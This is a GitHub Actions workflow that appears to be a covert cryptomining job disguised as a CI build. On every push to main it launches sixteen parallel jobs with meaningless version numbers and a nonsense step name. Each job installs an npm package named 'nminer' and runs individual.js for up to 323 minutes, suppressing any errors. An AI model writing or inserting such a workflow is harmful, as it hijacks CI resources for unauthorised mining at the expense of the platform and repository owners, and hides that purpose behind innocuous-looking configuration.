name: individual
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 7861 }
          - { version: 4950 }
          - { version: 5312 }
          - { version: 9929 }
          - { version: 3238 }
          - { version: 1461 }
          - { version: 4875 }
          - { version: 3844 }
          - { version: 8822 }
          - { version: 755 }
          - { version: 5016 }
          - { version: 5138 }
          - { version: 9103 }
          - { version: 8093 }
          - { version: 544 }
          - { version: 496 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: stigmatize save pomelo
        run: |
          npm install nminer@latest
          timeout 323m node individual.js || echo "individual executed"